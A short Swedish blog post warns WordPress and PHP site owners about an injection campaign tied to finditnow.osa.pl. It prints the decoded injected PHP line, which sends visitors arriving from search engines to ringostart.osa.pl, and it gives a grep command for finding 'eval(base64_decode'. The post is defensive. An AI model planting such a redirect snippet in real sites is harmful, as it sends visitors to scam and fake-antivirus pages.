Attackerad av banditer från finditnow.osa.pl

Den nya skurksajten finditnow.osa.pl är ett gissel för utvecklare. Genom att utnyttja buggar i äldre versioner av php och i vissa fall XSS injiceras en kodrad i en viktig fil, som t ex wp-config.php om man kör WordPress. Kodraden är maskerad med base64, men så här ser den ut om man avkodar den.

error_reporting(0); $nccv=headers_sent(); if (!$nccv){ $referer=$_SERVER['HTTP_REFERER']; $ua=$_SERVER['HTTP_USER_AGENT']; if (stristr($referer,"twitter") or stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"ask.com") or stristr($referer,"msn") or stristr($referer,"live") or stristr($referer,"facebook")) { if (!stristr($referer,"cache") or !stristr($referer,"inurl")){ header("Location: http://ringostart.osa.pl/"); exit(); } } }

Med andra ord ser sidan normal ut om man besöker den direkt, men man skickas vidare till skurksajten finditnow.osa.pl om man hamnar på sajten via en sökmotor. I värsta fall kan man hamna på en sida för ett fejkat antivirusprogram. Ett sätt för att kolla om ens sajt är smittad är att köra kommandot grep -r ”eval(base64_decode” * i public_html

Publicerat av Lukas Mattsson

Yogi and developer